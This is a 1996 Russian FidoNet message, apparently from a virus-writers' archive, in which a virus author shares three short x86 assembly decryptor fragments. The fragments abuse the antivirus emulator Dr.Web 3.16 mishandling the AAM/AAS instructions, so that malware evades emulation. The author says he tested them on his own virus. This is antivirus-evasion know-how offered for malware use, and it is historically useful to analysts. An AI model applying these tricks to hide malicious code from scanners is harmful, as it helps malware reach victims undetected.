Msg : Prev 1676 / 4681 Next
From: Reminder
1996-11-02 18:27:50

To  : All

Subj:

WEB. again & again ;)


Привет All! 

Web 3.16 

При получении вчера сего чуда, я как всегда занялся прикалываться 
над ним. Да, вынужден сообщить, что 0 в al при несуществующей 
функции он уже просекает, но mov ax,0d07h/int 21h/al=ff по прежнему нет, 
а также обращения к портам и памяти вне его сферы, 
но не об этом я хочу сказать, а вот о чем: 

mov ax,7777h 
aad 
aas 
aam 
call $+3 
pop si 
add si,ax 
jmp si 
xor bx,ax 
again: ;)) 

или попроще: 

mov ax,0FF07h 
aam 
call $+3 
pop si 
add si,ax 
jmp si 
xor bx,ax 
again: ;) 

или вот: ;) 

mov ax,0DEADh ;))) 
aas 
aam 
call $+3 
pop si 
add si,ax 
jmp si 
xor bx,ax 
again: ;) 

где сей кусок это часть расшифровщика, а bx - это ключ. 
в реальном исполнении команда xor bx,ax не исполняется, 
а в web'овском - да, что лишний раз подчеркивает кривизну 
реализации эмулятора (внешних обращений, как видите - нет). 
неспособность правильно эмулить команду aam (а эмулит ли web ее вообще ?) 
и, как я подозреваю всех команд данного типа, дает нам еще один 
вариант обхода сего глюкодрома. 

p.S. Тестировалось на моем вирусе Never-Never (RCE-1000) из iv_9. 

С бестовыми регардами , Kostya Volkov aka Reminder 

.' [SGWW] [DVC] [Crematorium fans Team] [MK Team] `. 

--- 
* Origin: Kostya Volkov aka Reminder (2:4631/17) 
VX Heavens - коллекция вирусов,исходников и статей.
Нажми Alt + Home, чтобы перейти к первому сообщению
Пользовательского поиска